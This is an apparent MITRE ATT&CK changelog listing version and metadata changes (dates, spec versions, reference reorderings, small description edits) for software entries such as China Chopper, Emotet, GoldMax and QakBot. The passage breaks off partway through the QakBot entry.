modified2020-06-29 15:59:07.478000+00:002023-03-22 00:10:02.140000+00:00
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_version1.01.1

[S0521] BloodHound

Current version: 1.4

Version changed from: 1.3 → 1.4

Details
values_changed
STIX FieldOld valueNew Value
modified2022-09-27 18:19:01.118000+00:002023-02-16 18:51:10.090000+00:00
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_version1.31.4

[S0462] CARROTBAT

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2020-06-15 15:13:27.660000+00:002023-03-22 03:24:06.264000+00:00
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_version1.01.1

[S0023] CHOPSTICK

Current version: 2.3

Version changed from: 2.2 → 2.3

Details
values_changed
STIX FieldOld valueNew Value
modified2022-04-14 17:21:52.879000+00:002023-03-26 17:51:20.403000+00:00
external_references[9]['url']https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-apt28.pdfhttps://web.archive.org/web/20151022204649/https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-apt28.pdf
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_version2.22.3

[S0631] Chaes

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2021-10-12 21:51:39.986000+00:002023-03-24 21:17:54.342000+00:00
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_version1.01.1

[S0020] China Chopper

Current version: 2.4

Version changed from: 2.3 → 2.4


Old Description
New Description
t1[China Chopper](https://attack.mitre.org/software/S0020) is t1[China Chopper](https://attack.mitre.org/software/S0020) is 
>a [Web Shell](https://attack.mitre.org/techniques/T1505/003)>a [Web Shell](https://attack.mitre.org/techniques/T1505/003)
> hosted on Web servers to provide access back into an enterp> hosted on Web servers to provide access back into an enterp
>rise network that does not rely on an infected system callin>rise network that does not rely on an infected system callin
>g back to a remote command and control server. (Citation: Le>g back to a remote command and control server.(Citation: Lee
>e 2013) It has been used by several threat groups. (Citation> 2013) It has been used by several threat groups.(Citation: 
>: Dell TG-3390) (Citation: FireEye Periscope March 2018)(Cit>Dell TG-3390)(Citation: FireEye Periscope March 2018)(Citati
>ation: CISA AA21-200A APT40 July 2021)>on: CISA AA21-200A APT40 July 2021)(Citation: Rapid7 HAFNIUM
 > Mar 2021)
Details
values_changed
STIX FieldOld valueNew Value
modified2022-04-15 15:15:51.199000+00:002023-04-10 21:53:43.748000+00:00
description[China Chopper](https://attack.mitre.org/software/S0020) is a [Web Shell](https://attack.mitre.org/techniques/T1505/003) hosted on Web servers to provide access back into an enterprise network that does not rely on an infected system calling back to a remote command and control server. (Citation: Lee 2013) It has been used by several threat groups. (Citation: Dell TG-3390) (Citation: FireEye Periscope March 2018)(Citation: CISA AA21-200A APT40 July 2021)[China Chopper](https://attack.mitre.org/software/S0020) is a [Web Shell](https://attack.mitre.org/techniques/T1505/003) hosted on Web servers to provide access back into an enterprise network that does not rely on an infected system calling back to a remote command and control server.(Citation: Lee 2013) It has been used by several threat groups.(Citation: Dell TG-3390)(Citation: FireEye Periscope March 2018)(Citation: CISA AA21-200A APT40 July 2021)(Citation: Rapid7 HAFNIUM Mar 2021)
external_references[4]['source_name']FireEye Periscope March 2018Rapid7 HAFNIUM Mar 2021
external_references[4]['description']FireEye. (2018, March 16). Suspected Chinese Cyber Espionage Group (TEMP.Periscope) Targeting U.S. Engineering and Maritime Industries. Retrieved April 11, 2018.Eoin Miller. (2021, March 23). Defending Against the Zero Day: Analyzing Attacker Behavior Post-Exploitation of Microsoft Exchange. Retrieved October 27, 2022.
external_references[4]['url']https://www.fireeye.com/blog/threat-research/2018/03/suspected-chinese-espionage-group-targeting-maritime-and-engineering-industries.htmlhttps://www.rapid7.com/blog/post/2021/03/23/defending-against-the-zero-day-analyzing-attacker-behavior-post-exploitation-of-microsoft-exchange/
external_references[5]['source_name']Lee 2013FireEye Periscope March 2018
external_references[5]['description']Lee, T., Hanzlik, D., Ahl, I. (2013, August 7). Breaking Down the China Chopper Web Shell - Part I. Retrieved March 27, 2015.FireEye. (2018, March 16). Suspected Chinese Cyber Espionage Group (TEMP.Periscope) Targeting U.S. Engineering and Maritime Industries. Retrieved April 11, 2018.
external_references[5]['url']https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-i.htmlhttps://www.fireeye.com/blog/threat-research/2018/03/suspected-chinese-espionage-group-targeting-maritime-and-engineering-industries.html
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_version2.32.4
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'Lee 2013', 'description': 'Lee, T., Hanzlik, D., Ahl, I. (2013, August 7). Breaking Down the China Chopper Web Shell - Part I. Retrieved March 27, 2015.', 'url': 'https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-i.html'}

[S0154] Cobalt Strike

Current version: 1.10

Version changed from: 1.9 → 1.10

Details
values_changed
STIX FieldOld valueNew Value
modified2022-10-12 23:24:12.980000+00:002023-03-07 13:05:11.028000+00:00
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_version1.91.10

[S0126] ComRAT

Current version: 1.4

Version changed from: 1.3 → 1.4

Details
values_changed
STIX FieldOld valueNew Value
modified2022-10-18 21:58:12.936000+00:002023-03-22 03:30:00.985000+00:00
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_version1.31.4

[S0492] CookieMiner

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2020-10-22 01:50:12.660000+00:002023-03-22 03:33:29.192000+00:00
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_version1.01.1

[S0694] DRATzarus

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
values_changed
STIX FieldOld valueNew Value
modified2022-04-12 20:41:58.960000+00:002023-03-17 13:52:45.671000+00:00
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_version1.01.1

[S0673] DarkWatchman

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
values_changed
STIX FieldOld valueNew Value
modified2022-10-18 23:16:37.724000+00:002023-03-22 03:34:53.944000+00:00
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_version1.01.1

[S0354] Denis

Current version: 1.2

Version changed from: 1.1 → 1.2

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2020-06-30 15:06:42.569000+00:002023-03-22 03:36:59.569000+00:00
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_version1.11.2

[S0367] Emotet

Current version: 1.4

Version changed from: 1.3 → 1.4

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2020-11-24 20:15:54.954000+00:002023-01-17 22:19:58.856000+00:00
external_references[3]['source_name']Trend Micro Banking Malware Jan 2019Talos Emotet Jan 2019
external_references[3]['description']Salvio, J.. (2014, June 27). New Banking Malware Uses Network Sniffing for Data Theft. Retrieved March 25, 2019.Brumaghin, E.. (2019, January 15). Emotet re-emerges after the holidays. Retrieved March 25, 2019.
external_references[3]['url']https://blog.trendmicro.com/trendlabs-security-intelligence/new-banking-malware-uses-network-sniffing-for-data-theft/https://blog.talosintelligence.com/2019/01/return-of-emotet.html
external_references[4]['source_name']Kaspersky Emotet Jan 2019CIS Emotet Apr 2017
external_references[4]['description']Shulmin, A. . (2015, April 9). The Banking Trojan Emotet: Detailed Analysis. Retrieved March 25, 2019.CIS. (2017, April 28). Emotet Changes TTPs and Arrives in United States. Retrieved January 17, 2019.
external_references[4]['url']https://securelist.com/the-banking-trojan-emotet-detailed-analysis/69560/https://www.cisecurity.org/blog/emotet-changes-ttp-and-arrives-in-united-states/
external_references[5]['source_name']CIS Emotet Apr 2017CIS Emotet Dec 2018
external_references[5]['description']CIS. (2017, April 28). Emotet Changes TTPs and Arrives in United States. Retrieved January 17, 2019.CIS. (2018, December 12). MS-ISAC Security Primer- Emotet. Retrieved March 25, 2019.
external_references[5]['url']https://www.cisecurity.org/blog/emotet-changes-ttp-and-arrives-in-united-states/https://www.cisecurity.org/white-papers/ms-isac-security-primer-emotet/
external_references[6]['source_name']Malwarebytes Emotet Dec 2017Red Canary Emotet Feb 2019
external_references[6]['description']Smith, A.. (2017, December 22). Protect your network from Emotet Trojan with Malwarebytes Endpoint Security. Retrieved January 17, 2019.Donohue, B.. (2019, February 13). https://redcanary.com/blog/stopping-emotet-before-it-moves-laterally/. Retrieved March 25, 2019.
external_references[6]['url']https://support.malwarebytes.com/docs/DOC-2295https://redcanary.com/blog/stopping-emotet-before-it-moves-laterally/
external_references[7]['source_name']Symantec Emotet Jul 2018ESET Emotet Nov 2018
external_references[7]['description']Symantec. (2018, July 18). The Evolution of Emotet: From Banking Trojan to Threat Distributor. Retrieved March 25, 2019.ESET . (2018, November 9). Emotet launches major new spam campaign. Retrieved March 25, 2019.
external_references[7]['url']https://www.symantec.com/blogs/threat-intelligence/evolution-emotet-trojan-distributorhttps://www.welivesecurity.com/2018/11/09/emotet-launches-major-new-spam-campaign/
external_references[8]['source_name']US-CERT Emotet Jul 2018Secureworks Emotet Nov 2018
external_references[8]['description']US-CERT. (2018, July 20). Alert (TA18-201A) Emotet Malware. Retrieved March 25, 2019.Mclellan, M.. (2018, November 19). Lazy Passwords Become Rocket Fuel for Emotet SMB Spreader. Retrieved March 25, 2019.
external_references[8]['url']https://www.us-cert.gov/ncas/alerts/TA18-201Ahttps://www.secureworks.com/blog/lazy-passwords-become-rocket-fuel-for-emotet-smb-spreader
external_references[9]['source_name']ESET Emotet Nov 2018Picus Emotet Dec 2018
external_references[9]['description']ESET . (2018, November 9). Emotet launches major new spam campaign. Retrieved March 25, 2019.Özarslan, S. (2018, December 21). The Christmas Card you never wanted - A new wave of Emotet is back to wreak havoc. Retrieved March 25, 2019.
external_references[9]['url']https://www.welivesecurity.com/2018/11/09/emotet-launches-major-new-spam-campaign/https://www.picussecurity.com/blog/the-christmas-card-you-never-wanted-a-new-wave-of-emotet-is-back-to-wreak-havoc.html
external_references[10]['source_name']Secureworks Emotet Nov 2018Trend Micro Banking Malware Jan 2019
external_references[10]['description']Mclellan, M.. (2018, November 19). Lazy Passwords Become Rocket Fuel for Emotet SMB Spreader. Retrieved March 25, 2019.Salvio, J.. (2014, June 27). New Banking Malware Uses Network Sniffing for Data Theft. Retrieved March 25, 2019.
external_references[10]['url']https://www.secureworks.com/blog/lazy-passwords-become-rocket-fuel-for-emotet-smb-spreaderhttps://blog.trendmicro.com/trendlabs-security-intelligence/new-banking-malware-uses-network-sniffing-for-data-theft/
external_references[11]['source_name']Talos Emotet Jan 2019Kaspersky Emotet Jan 2019
external_references[11]['description']Brumaghin, E.. (2019, January 15). Emotet re-emerges after the holidays. Retrieved March 25, 2019.Shulmin, A. . (2015, April 9). The Banking Trojan Emotet: Detailed Analysis. Retrieved March 25, 2019.
external_references[11]['url']https://blog.talosintelligence.com/2019/01/return-of-emotet.htmlhttps://securelist.com/the-banking-trojan-emotet-detailed-analysis/69560/
external_references[12]['source_name']Trend Micro Emotet Jan 2019Malwarebytes Emotet Dec 2017
external_references[12]['description']Trend Micro. (2019, January 16). Exploring Emotet's Activities . Retrieved March 25, 2019.Smith, A.. (2017, December 22). Protect your network from Emotet Trojan with Malwarebytes Endpoint Security. Retrieved January 17, 2019.
external_references[12]['url']https://documents.trendmicro.com/assets/white_papers/ExploringEmotetsActivities_Final.pdfhttps://support.malwarebytes.com/docs/DOC-2295
external_references[13]['source_name']CIS Emotet Dec 2018Symantec Emotet Jul 2018
external_references[13]['description']CIS. (2018, December 12). MS-ISAC Security Primer- Emotet. Retrieved March 25, 2019.Symantec. (2018, July 18). The Evolution of Emotet: From Banking Trojan to Threat Distributor. Retrieved March 25, 2019.
external_references[13]['url']https://www.cisecurity.org/white-papers/ms-isac-security-primer-emotet/https://www.symantec.com/blogs/threat-intelligence/evolution-emotet-trojan-distributor
external_references[14]['source_name']Picus Emotet Dec 2018Trend Micro Emotet Jan 2019
external_references[14]['description']Özarslan, S. (2018, December 21). The Christmas Card you never wanted - A new wave of Emotet is back to wreak havoc. Retrieved March 25, 2019.Trend Micro. (2019, January 16). Exploring Emotet's Activities . Retrieved March 25, 2019.
external_references[14]['url']https://www.picussecurity.com/blog/the-christmas-card-you-never-wanted-a-new-wave-of-emotet-is-back-to-wreak-havoc.htmlhttps://documents.trendmicro.com/assets/white_papers/ExploringEmotetsActivities_Final.pdf
external_references[15]['source_name']Red Canary Emotet Feb 2019US-CERT Emotet Jul 2018
external_references[15]['description']Donohue, B.. (2019, February 13). https://redcanary.com/blog/stopping-emotet-before-it-moves-laterally/. Retrieved March 25, 2019.US-CERT. (2018, July 20). Alert (TA18-201A) Emotet Malware. Retrieved March 25, 2019.
external_references[15]['url']https://redcanary.com/blog/stopping-emotet-before-it-moves-laterally/https://www.us-cert.gov/ncas/alerts/TA18-201A
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_version1.31.4

[S0363] Empire

Current version: 1.6

Version changed from: 1.5 → 1.6

Details
values_changed
STIX FieldOld valueNew Value
modified2022-06-03 17:55:43.889000+00:002023-03-22 03:43:09.336000+00:00
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_version1.51.6

[S0343] Exaramel for Windows

Current version: 2.2

Version changed from: 2.1 → 2.2

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2020-06-17 23:21:44.445000+00:002023-03-26 18:59:38.457000+00:00
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_version2.12.2

[S0277] FruitFly

Current version: 1.2

Version changed from: 1.1 → 1.2

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2020-03-30 16:42:09.499000+00:002023-03-22 03:55:46.184000+00:00
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_version1.11.2

[S0666] Gelsemium

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
values_changed
STIX FieldOld valueNew Value
modified2022-05-06 19:37:01.617000+00:002023-03-26 19:02:24.792000+00:00
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_version1.01.1

[S0597] GoldFinder

Current version: 1.1

Version changed from: 1.0 → 1.1


Old Description
New Description
t1[GoldFinder](https://attack.mitre.org/software/S0597) is a ct1[GoldFinder](https://attack.mitre.org/software/S0597) is a c
>ustom HTTP tracer tool written in Go that logs the route a p>ustom HTTP tracer tool written in Go that logs the route a p
>acket takes between a compromised network and a C2 server. I>acket takes between a compromised network and a C2 server. I
>t can be used to inform  threat actors of potential points o>t can be used to inform  threat actors of potential points o
>f discovery or logging of their actions, including C2 relate>f discovery or logging of their actions, including C2 relate
>d to other malware. [GoldFinder](https://attack.mitre.org/so>d to other malware. [GoldFinder](https://attack.mitre.org/so
>ftware/S0597) was discovered in early 2021 during an investi>ftware/S0597) was discovered in early 2021 during an investi
>gation into the SolarWinds cyber intrusion by [APT29](https:>gation into the [SolarWinds Compromise](https://attack.mitre
>//attack.mitre.org/groups/G0016).(Citation: MSTIC NOBELIUM M>.org/campaigns/C0024) by [APT29](https://attack.mitre.org/gr
>ar 2021)>oups/G0016).(Citation: MSTIC NOBELIUM Mar 2021)
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2021-04-24 22:32:23.654000+00:002023-03-27 19:50:35.143000+00:00
description[GoldFinder](https://attack.mitre.org/software/S0597) is a custom HTTP tracer tool written in Go that logs the route a packet takes between a compromised network and a C2 server. It can be used to inform threat actors of potential points of discovery or logging of their actions, including C2 related to other malware. [GoldFinder](https://attack.mitre.org/software/S0597) was discovered in early 2021 during an investigation into the SolarWinds cyber intrusion by [APT29](https://attack.mitre.org/groups/G0016).(Citation: MSTIC NOBELIUM Mar 2021)[GoldFinder](https://attack.mitre.org/software/S0597) is a custom HTTP tracer tool written in Go that logs the route a packet takes between a compromised network and a C2 server. It can be used to inform threat actors of potential points of discovery or logging of their actions, including C2 related to other malware. [GoldFinder](https://attack.mitre.org/software/S0597) was discovered in early 2021 during an investigation into the [SolarWinds Compromise](https://attack.mitre.org/campaigns/C0024) by [APT29](https://attack.mitre.org/groups/G0016).(Citation: MSTIC NOBELIUM Mar 2021)
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_version1.01.1

[S0588] GoldMax

Current version: 2.1

Version changed from: 2.0 → 2.1


Old Description
New Description
t1[GoldMax](https://attack.mitre.org/software/S0588) is a secot1[GoldMax](https://attack.mitre.org/software/S0588) is a seco
>nd-stage C2 backdoor written in Go with Windows and Linux va>nd-stage C2 backdoor written in Go with Windows and Linux va
>riants that are nearly identical in functionality. [GoldMax]>riants that are nearly identical in functionality. [GoldMax]
>(https://attack.mitre.org/software/S0588) was discovered in >(https://attack.mitre.org/software/S0588) was discovered in 
>early 2021 during the investigation into the SolarWinds intr>early 2021 during the investigation into the [SolarWinds Com
>usion, and has likely been used by [APT29](https://attack.mi>promise](https://attack.mitre.org/campaigns/C0024), and has 
>tre.org/groups/G0016) since at least mid-2019. [GoldMax](htt>likely been used by [APT29](https://attack.mitre.org/groups/
>ps://attack.mitre.org/software/S0588) uses multiple defense >G0016) since at least mid-2019. [GoldMax](https://attack.mit
>evasion techniques, including avoiding virtualization execut>re.org/software/S0588) uses multiple defense evasion techniq
>ion and masking malicious traffic.(Citation: MSTIC NOBELIUM >ues, including avoiding virtualization execution and masking
>Mar 2021)(Citation: FireEye SUNSHUTTLE Mar 2021)(Citation: C> malicious traffic.(Citation: MSTIC NOBELIUM Mar 2021)(Citat
>rowdStrike StellarParticle January 2022)>ion: FireEye SUNSHUTTLE Mar 2021)(Citation: CrowdStrike Stel
 >larParticle January 2022)
Details
values_changed
STIX FieldOld valueNew Value
modified2022-04-15 22:23:36.883000+00:002023-03-27 19:46:46.532000+00:00
description[GoldMax](https://attack.mitre.org/software/S0588) is a second-stage C2 backdoor written in Go with Windows and Linux variants that are nearly identical in functionality. [GoldMax](https://attack.mitre.org/software/S0588) was discovered in early 2021 during the investigation into the SolarWinds intrusion, and has likely been used by [APT29](https://attack.mitre.org/groups/G0016) since at least mid-2019. [GoldMax](https://attack.mitre.org/software/S0588) uses multiple defense evasion techniques, including avoiding virtualization execution and masking malicious traffic.(Citation: MSTIC NOBELIUM Mar 2021)(Citation: FireEye SUNSHUTTLE Mar 2021)(Citation: CrowdStrike StellarParticle January 2022)[GoldMax](https://attack.mitre.org/software/S0588) is a second-stage C2 backdoor written in Go with Windows and Linux variants that are nearly identical in functionality. [GoldMax](https://attack.mitre.org/software/S0588) was discovered in early 2021 during the investigation into the [SolarWinds Compromise](https://attack.mitre.org/campaigns/C0024), and has likely been used by [APT29](https://attack.mitre.org/groups/G0016) since at least mid-2019. [GoldMax](https://attack.mitre.org/software/S0588) uses multiple defense evasion techniques, including avoiding virtualization execution and masking malicious traffic.(Citation: MSTIC NOBELIUM Mar 2021)(Citation: FireEye SUNSHUTTLE Mar 2021)(Citation: CrowdStrike StellarParticle January 2022)
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_version2.02.1

[S0531] Grandoreiro

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
values_changed
STIX FieldOld valueNew Value
modified2022-10-19 22:11:10.040000+00:002023-03-26 19:05:29.235000+00:00
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_version1.01.1

[S0376] HOPLIGHT

Current version: 1.2

Version changed from: 1.1 → 1.2

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2020-03-30 19:47:21.986000+00:002023-03-28 20:24:33.471000+00:00
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_version1.11.2

[S1022] IceApple

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
values_changed
STIX FieldOld valueNew Value
modified2022-07-25 16:03:40.451000+00:002023-03-22 04:45:42.926000+00:00
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_version1.01.1

[S0357] Impacket

Current version: 1.4

Version changed from: 1.3 → 1.4

Details
values_changed
STIX FieldOld valueNew Value
modified2022-09-27 18:20:48.473000+00:002023-01-23 20:52:37.112000+00:00
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_version1.31.4

[S0669] KOCTOPUS

Current version: 1.2

Version changed from: 1.1 → 1.2

Details
values_changed
STIX FieldOld valueNew Value
modified2022-07-29 19:46:14.547000+00:002023-03-22 04:47:58.740000+00:00
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_version1.11.2

[S0349] LaZagne

Current version: 1.4

Version changed from: 1.3 → 1.4

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2021-10-15 16:56:52.156000+00:002023-03-02 20:48:02.590000+00:00
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_version1.31.4

[S0451] LoudMiner

Current version: 1.3

Version changed from: 1.2 → 1.3

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2021-10-12 16:31:13.272000+00:002023-03-22 04:51:42.922000+00:00
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_version1.21.3

[S0409] Machete

Current version: 2.1

Version changed from: 2.0 → 2.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2021-04-12 03:16:03.258000+00:002023-03-22 04:52:58.843000+00:00
external_references[1]['source_name']MachetePyark
external_references[1]['description'](Citation: Securelist Machete Aug 2014)(Citation: 360 Machete Sep 2020)
external_references[2]['source_name']PyarkMachete
external_references[2]['description'](Citation: 360 Machete Sep 2020)(Citation: Securelist Machete Aug 2014)
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_version2.02.1

[S0002] Mimikatz

Current version: 1.7

Version changed from: 1.6 → 1.7

Details
values_changed
STIX FieldOld valueNew Value
modified2022-08-03 15:07:11.534000+00:002023-03-07 13:04:10.731000+00:00
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_version1.61.7

[S0256] Mosquito

Current version: 1.2

Version changed from: 1.1 → 1.2

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2020-03-30 17:06:45.586000+00:002023-03-26 19:19:33.603000+00:00
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_version1.11.2

[S0198] NETWIRE

Current version: 1.5

Version changed from: 1.4 → 1.5

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2021-10-12 11:21:09.567000+00:002023-03-26 19:24:00.073000+00:00
external_references[2]['source_name']FireEye APT33 Sept 2017FireEye APT33 Webinar Sept 2017
external_references[2]['description']O'Leary, J., et al. (2017, September 20). Insights into Iranian Cyber Espionage: APT33 Targets Aerospace and Energy Sectors and has Ties to Destructive Malware. Retrieved February 15, 2018.Davis, S. and Carr, N. (2017, September 21). APT33: New Insights into Iranian Cyber Espionage Group. Retrieved February 15, 2018.
external_references[2]['url']https://www.fireeye.com/blog/threat-research/2017/09/apt33-insights-into-iranian-cyber-espionage.htmlhttps://www.brighttalk.com/webcast/10703/275683
external_references[4]['source_name']FireEye APT33 Webinar Sept 2017FireEye APT33 Sept 2017
external_references[4]['description']Davis, S. and Carr, N. (2017, September 21). APT33: New Insights into Iranian Cyber Espionage Group. Retrieved February 15, 2018.O'Leary, J., et al. (2017, September 20). Insights into Iranian Cyber Espionage: APT33 Targets Aerospace and Energy Sectors and has Ties to Destructive Malware. Retrieved February 15, 2018.
external_references[4]['url']https://www.brighttalk.com/webcast/10703/275683https://www.fireeye.com/blog/threat-research/2017/09/apt33-insights-into-iranian-cyber-espionage.html
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_version1.41.5

[S0039] Net

Current version: 2.4

Version changed from: 2.3 → 2.4

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2021-10-15 20:33:54.392000+00:002023-03-03 16:49:41.059000+00:00
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_version2.32.4

[S0457] Netwalker

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2020-06-16 16:14:19.924000+00:002023-03-22 05:03:29.436000+00:00
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_version1.01.1

[S0223] POWERSTATS

Current version: 2.3

Version changed from: 2.2 → 2.3

Details
values_changed
STIX FieldOld valueNew Value
modified2022-10-12 19:06:51.405000+00:002023-03-22 05:13:46.664000+00:00
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_version2.22.3

[S0517] Pillowmint

Current version: 1.2

Version changed from: 1.1 → 1.2

Details
values_changed
STIX FieldOld valueNew Value
modified2022-07-29 19:50:27.063000+00:002023-03-26 19:34:38.763000+00:00
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_version1.11.2

[S0097] Ping

Current version: 1.3

Version changed from: 1.2 → 1.3

Details
values_changed
STIX FieldOld valueNew Value
modified2022-10-13 18:56:52.195000+00:002023-01-04 21:59:04.229000+00:00
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_version1.21.3

[S0501] PipeMon

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2020-10-16 21:01:16.880000+00:002023-03-26 19:38:46.705000+00:00
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_version1.01.1

[S0013] PlugX

Current version: 3.1

Version changed from: 3.0 → 3.1

Details
values_changed
STIX FieldOld valueNew Value
modified2022-04-15 16:30:28.192000+00:002023-04-10 17:14:55.086000+00:00
external_references[11]['url']http://www.novetta.com/wp-content/uploads/2014/11/Executive_Summary-Final_1.pdfhttps://web.archive.org/web/20230115144216/http://www.novetta.com/wp-content/uploads/2014/11/Executive_Summary-Final_1.pdf
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_version3.03.1

[S0428] PoetRAT

Current version: 2.2

Version changed from: 2.1 → 2.2

Details
values_changed
STIX FieldOld valueNew Value
modified2022-04-19 01:41:29.396000+00:002023-03-22 05:09:38.370000+00:00
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_version2.12.2

[S0518] PolyglotDuke

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2020-10-09 16:07:59.493000+00:002023-03-26 19:42:34.359000+00:00
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_version1.01.1

[S1012] PowerLess

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_aliases['PowerLess']
values_changed
STIX FieldOld valueNew Value
modified2022-06-02 19:48:39.830000+00:002023-03-28 17:21:55.473000+00:00
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_version1.01.1

[S0685] PowerPunch

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
values_changed
STIX FieldOld valueNew Value
modified2022-04-15 12:11:41.617000+00:002023-03-22 05:12:04.169000+00:00
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_version1.01.1

[S0194] PowerSploit

Current version: 1.6

Version changed from: 1.5 → 1.6

Details
values_changed
STIX FieldOld valueNew Value
modified2022-09-27 18:18:15.392000+00:002023-03-22 05:12:48.213000+00:00
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_version1.51.6

[S0029] PsExec

Current version: 1.4

Version changed from: 1.3 → 1.4

Details
values_changed
STIX FieldOld valueNew Value
modified2022-11-01 18:29:13.666000+00:002023-03-02 20:43:41.287000+00:00
x_mitre_attack_spec_version3.0.03.1.0
x_mitre_version1.31.4

[S0269] QUADAGENT

Current version: 1.2

Version changed from: 1.1 → 1.2

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2020-03-28 21:38:43.793000+00:002023-03-22 05:20:12.492000+00:00
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_version1.11.2

[S0650] QakBot

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2021-10-15 21:47:13.084000+00:002023-04-14 14:37:59.896000+00:00
external_references[1]['source_name']PinkslipbotQuackBot
external_references[1]['description'](Citation: Kaspersky QakBot September 2021)(Citation: ATT QakBot April 2021)(Citation: Kaspersky QakBot September 2021)
external_references[2]['source_name']QuackBotPinkslipbot
external_references[2]['description'](Citation: Kaspersky QakBot September 2021)(Citation: Kaspersky QakBot September 2021)(Citation: ATT QakBot April 2021)
external_references[4]['source_name']Trend Micro Qakbot December 2020Kaspersky QakBot September 2021
external_references[4]['description']Trend Micro. (2020, December 17). QAKBOT: A decade-old malware still with new tricks. Retrieved September 27, 2021.Kuzmenko, A. et al. (2021, September 2). QakBot technical analysis. Retrieved September 27, 2021.
